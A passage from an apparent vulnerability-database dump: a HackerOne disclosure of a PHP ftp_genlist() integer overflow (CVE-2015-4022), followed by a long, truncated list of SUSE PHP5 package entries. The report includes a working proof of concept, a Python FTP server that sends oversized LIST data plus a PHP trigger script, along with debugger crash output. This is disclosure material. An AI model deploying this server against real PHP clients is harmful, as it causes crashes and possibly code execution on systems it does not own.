[3]\n1863 }\n1864 lastch = ch;\n1865 }\n1866 *entry = NULL;\n```\n\nThis results in the allocated buffer at [2] being to small to hold the data written to\nthe tempfile, which results in a heap overflow at [3] when loading the contents of the\ntempfile back into memory.\n\nThese kind of bugs are well-known to be exploitable and since php_stream_getc uses structs\nlocated on the heap, which may be overwritten, I think that this bug can be leveraged to attain\nremote code execution.\n\nRegards,\nMax Spelsberg\n\n\n```\nmalicious_server.py\n===================\n#!/usr/bin/env python2\n# coding: utf-8\n\n# based on https://gist.github.com/scturtle/1035886\n\nimport os,socket,threading,time\n\nallow_delete = False\nlocal_ip = \"localhost\"\nlocal_port = 8887\ncurrdir=os.path.abspath('.')\n\nclass FTPserverThread(threading.Thread):\n def __init__(self,(conn,addr)):\n self.conn=conn\n self.addr=addr\n self.basewd=currdir\n self.cwd=self.basewd\n self.rest=False\n self.pasv_mode=False\n threading.Thread.__init__(self)\n\n def run(self):\n self.conn.send('220 Welcome!\\r\\n')\n while True:\n cmd=self.conn.recv(256)\n if not cmd: break\n else:\n print 'Recieved:',cmd\n try:\n func=getattr(self,cmd[:4].strip().upper())\n func(cmd)\n except Exception,e:\n print 'ERROR:',e\n #traceback.print_exc()\n self.conn.send('500 Sorry.\\r\\n')\n self.conn.close()\n\n def TYPE(self,cmd):\n self.mode=cmd[5]\n self.conn.send('200 Binary mode.\\r\\n')\n\n def PASV(self,cmd): # from http://goo.gl/3if2U\n self.pasv_mode = True\n self.servsock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n self.servsock.bind((local_ip,0))\n self.servsock.listen(1)\n ip, port = self.servsock.getsockname()\n print 'open', ip, port\n self.conn.send('227 Entering Passive Mode (%s,%u,%u).\\r\\n' %\n (','.join(ip.split('.')), port>>8&0xFF, port&0xFF))\n\n def start_datasock(self):\n if self.pasv_mode:\n self.datasock, addr = self.servsock.accept()\n print 'connect:', addr\n else:\n self.datasock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n self.datasock.connect((self.dataAddr,self.dataPort))\n\n def stop_datasock(self):\n self.datasock.close()\n if self.pasv_mode:\n self.servsock.close()\n\n # THIS is the interesting part \n def LIST(self,cmd):\n self.conn.send('150 Here comes the directory listing.\\r\\n')\n print 'list:', self.cwd\n self.start_datasock()\n\n # send 2^32 + 1 bytes of data\n for i in xrange(262144):\n if i % 10000 == 0:\n print \"%d\" % i\n self.datasock.send(\"B\"*16384)\n self.datasock.send(\"A\\r\\n\")\n\n self.stop_datasock()\n self.conn.send('226 Directory send OK.\\r\\n')\n\n\nclass FTPserver(threading.Thread):\n def __init__(self):\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.sock.bind((local_ip,local_port))\n threading.Thread.__init__(self)\n\n def run(self):\n self.sock.listen(5)\n while True:\n th=FTPserverThread(self.sock.accept())\n th.daemon=True\n th.start()\n\n def stop(self):\n self.sock.close()\n\nif __name__=='__main__':\n ftp=FTPserver()\n ftp.daemon=True\n ftp.start()\n print 'On', local_ip, ':', local_port\n raw_input('Enter to end...\\n')\n ftp.stop()\n```\n\n```\nbuggy.php\n=========\n<?php\n $id = ftp_connect(\"localhost\", 8887);\n ftp_pasv($id, TRUE);\n var_dump(ftp_rawlist($id, \"/\"));\n?>\n```\n\n\n```\nResult\n======\n(lldb) r ./buggy.php\nProcess 54712 launched: '/usr/bin/php' (x86_64)\nProcess 54712 stopped\n* thread #1: tid = 0x204e9, 0x00007fff86503056 libsystem_platform.dylib`_platform_memmove$VARIANT$Unknown + 182, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=1, address=0x1024243de)\n frame #0: 0x00007fff86503056 libsystem_platform.dylib`_platform_memmove$VARIANT$Unknown + 182\nlibsystem_platform.dylib`_platform_memmove$VARIANT$Unknown:\n-> 0x7fff86503056 <+182>: movb (%rsi,%r8), %cl\n 0x7fff8650305a <+186>: movb %cl, (%rdi,%r8)\n 0x7fff8650305e <+190>: subq $0x1, %rdx\n 0x7fff86503062 <+194>: je 0x7fff86503078 ; <+216>\n(lldb) register read rsi\n rsi = 0x00000001024243de\n(lldb) bt\n* thread #1: tid = 0x204e9, 0x00007fff86503056 libsystem_platform.dylib`_platform_memmove$VARIANT$Unknown + 182, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=1, address=0x1024243de)\n * frame #0: 0x00007fff86503056 libsystem_platform.dylib`_platform_memmove$VARIANT$Unknown + 182\n frame #1: 0x000000010031b2c7 php`_php_stream_read + 81\n frame #2: 0x000000010031b8a1 php`_php_stream_getc + 22\n frame #3: 0x000000010010ec3a php`___lldb_unnamed_function2574$$php + 614\n frame #4: 0x000000010010c21c php`___lldb_unnamed_function2530$$php + 118\n frame #5: 0x00000001003cb2af php`___lldb_unnamed_function9391$$php + 1752\n frame #6: 0x00000001003813b0 php`execute_ex + 79\n frame #7: 0x000000010035d592 php`zend_execute_scripts + 482\n frame #8: 0x0000000100308897 php`php_execute_script + 684\n frame #9: 0x00000001003edce0 php`___lldb_unnamed_function9505$$php + 4653\n frame #10: 0x00000001003ec93c php`___lldb_unnamed_function9503$$php + 1408\n frame #11: 0x00007fff8cb8d5c9 libdyld.dylib`start + 1\n(lldb)\n```\n[Note that the first three bytes (42, 43, de) of rsi have been overwritten!]\n", "edition": 7, "reporter": "ruben", "published": "2015-04-28T00:00:00", "title": "PHP (IBB): Integer overflow in ftp_genlist() resulting in heap overflow", "type": "hackerone", "enchantments": {"score": {"vector": "NONE", "value": 10.0}}, "h1reporter": {"profile_picture_urls": {"small": "/assets/avatars/default-71a302d706457f3d3a31eb30fa3e73e6cf0b1d677b8fa218eaeaffd67ae97918.png"}, "hacker_mediation": false, "disabled": false, "is_me?": false, "hackerone_triager": false, "url": "/ruben", "username": "ruben"}, "bulletinFamily": "bugbounty", "cvelist": ["CVE-2015-4022"], "modified": "2015-05-12T00:00:00", "id": "H1:73240", "href": "https://hackerone.com/reports/73240", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "suse": [{"lastseen": "2016-09-04T11:28:40", "references": ["https://bugzilla.suse.com/931776", "https://bugzilla.suse.com/935227", "https://bugzilla.suse.com/935234", "https://bugzilla.suse.com/935232", "https://bugzilla.suse.com/935274", "https://bugzilla.suse.com/935226", "https://bugzilla.suse.com/931421", "https://bugzilla.suse.com/927147", "https://bugzilla.suse.com/935224", "https://bugzilla.suse.com/931769", "https://bugzilla.suse.com/931772", "https://bugzilla.suse.com/935275", "https://bugzilla.suse.com/919080", "https://bugzilla.suse.com/933227"], "affectedPackage": [{"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-dba-debuginfo", "packageFilename": "php5-dba-debuginfo-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-gettext-debuginfo", "packageFilename": "php5-gettext-debuginfo-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-xmlreader", "packageFilename": "php5-xmlreader-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-sysvshm", "packageFilename": "php5-sysvshm-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-bcmath-debuginfo", "packageFilename": "php5-bcmath-debuginfo-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5", "packageFilename": "php5-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-mysql", "packageFilename": "php5-mysql-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-sysvmsg-debuginfo", "packageFilename": "php5-sysvmsg-debuginfo-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-sqlite-debuginfo", "packageFilename": "php5-sqlite-debuginfo-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-sysvsem", "packageFilename": "php5-sysvsem-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-mysql-debuginfo", "packageFilename": "php5-mysql-debuginfo-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-curl", "packageFilename": "php5-curl-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-snmp-debuginfo", "packageFilename": "php5-snmp-debuginfo-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-mcrypt", "packageFilename": "php5-mcrypt-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-xsl-debuginfo", "packageFilename": "php5-xsl-debuginfo-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-zlib", "packageFilename": "php5-zlib-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-gmp", "packageFilename": "php5-gmp-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-tokenizer", "packageFilename": "php5-tokenizer-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-xmlreader-debuginfo", "packageFilename": "php5-xmlreader-debuginfo-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-tokenizer-debuginfo", "packageFilename": "php5-tokenizer-debuginfo-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-calendar-debuginfo", "packageFilename": "php5-calendar-debuginfo-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-enchant", "packageFilename": "php5-enchant-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-shmop-debuginfo", "packageFilename": "php5-shmop-debuginfo-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-ldap-debuginfo", "packageFilename": "php5-ldap-debuginfo-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-fpm-debuginfo", "packageFilename": "php5-fpm-debuginfo-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-pcntl", "packageFilename": "php5-pcntl-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-debugsource", "packageFilename": "php5-debugsource-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-ctype-debuginfo", "packageFilename": "php5-ctype-debuginfo-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-json-debuginfo", "packageFilename": "php5-json-debuginfo-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-mbstring-debuginfo", "packageFilename": "php5-mbstring-debuginfo-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-odbc-debuginfo", "packageFilename": "php5-odbc-debuginfo-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-pcntl-debuginfo", "packageFilename": "php5-pcntl-debuginfo-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-zip-debuginfo", "packageFilename": "php5-zip-debuginfo-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-intl-debuginfo", "packageFilename": "php5-intl-debuginfo-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-fileinfo", "packageFilename": "php5-fileinfo-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-iconv", "packageFilename": "php5-iconv-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-mcrypt-debuginfo", "packageFilename": "php5-mcrypt-debuginfo-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-sockets-debuginfo", "packageFilename": "php5-sockets-debuginfo-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-calendar", "packageFilename": "php5-calendar-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-ldap", "packageFilename": "php5-ldap-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-bz2", "packageFilename": "php5-bz2-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-xsl", "packageFilename": "php5-xsl-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-dba", "packageFilename": "php5-dba-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "apache2-mod_php5", "packageFilename": "apache2-mod_php5-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-fpm", "packageFilename": "php5-fpm-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-debuginfo", "packageFilename": "php5-debuginfo-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-bz2-debuginfo", "packageFilename": "php5-bz2-debuginfo-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-sysvsem-debuginfo", "packageFilename": "php5-sysvsem-debuginfo-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-json", "packageFilename": "php5-json-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-suhosin-debuginfo", "packageFilename": "php5-suhosin-debuginfo-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-fastcgi", "packageFilename": "php5-fastcgi-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-iconv-debuginfo", "packageFilename": "php5-iconv-debuginfo-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-wddx-debuginfo", "packageFilename": "php5-wddx-debuginfo-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-exif-debuginfo", "packageFilename": "php5-exif-debuginfo-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-mbstring", "packageFilename": "php5-mbstring-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-gmp-debuginfo", "packageFilename": "php5-gmp-debuginfo-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-fastcgi-debuginfo", "packageFilename": "php5-fastcgi-debuginfo-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-pgsql-debuginfo", "packageFilename": "php5-pgsql-debuginfo-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-wddx", "packageFilename": "php5-wddx-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-bcmath", "packageFilename": "php5-bcmath-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-soap", "packageFilename": "php5-soap-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-sysvshm-debuginfo", "packageFilename": "php5-sysvshm-debuginfo-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-pdo", "packageFilename": "php5-pdo-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-fileinfo-debuginfo", "packageFilename": "php5-fileinfo-debuginfo-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-zlib-debuginfo", "packageFilename": "php5-zlib-debuginfo-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-odbc", "packageFilename": "php5-odbc-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-sysvmsg", "packageFilename": "php5-sysvmsg-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-sqlite", "packageFilename": "php5-sqlite-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-gd", "packageFilename": "php5-gd-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-gd-debuginfo", "packageFilename": "php5-gd-debuginfo-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-openssl-debuginfo", "packageFilename": "php5-openssl-debuginfo-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-openssl", "packageFilename": "php5-openssl-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-xmlrpc", "packageFilename": "php5-xmlrpc-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "apache2-mod_php5-debuginfo", "packageFilename": "apache2-mod_php5-debuginfo-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-ftp-debuginfo", "packageFilename": "php5-ftp-debuginfo-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-pear", "packageFilename": "php5-pear-5.5.14-30.1.noarch.rpm", "arch": "noarch", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-dom-debuginfo", "packageFilename": "php5-dom-debuginfo-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-pdo-debuginfo", "packageFilename": "php5-pdo-debuginfo-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-shmop", "packageFilename": "php5-shmop-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-exif", "packageFilename": "php5-exif-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-curl-debuginfo", "packageFilename": "php5-curl-debuginfo-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-suhosin", "packageFilename": "php5-suhosin-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-soap-debuginfo", "packageFilename": "php5-soap-debuginfo-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-dom", "packageFilename": "php5-dom-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-intl", "packageFilename": "php5-intl-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-gettext", "packageFilename": "php5-gettext-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-sockets", "packageFilename": "php5-sockets-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": "php5-enchant-debuginfo", "packageFilename": "php5-enchant-debuginfo-5.5.14-30.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-30.1", "packageName": 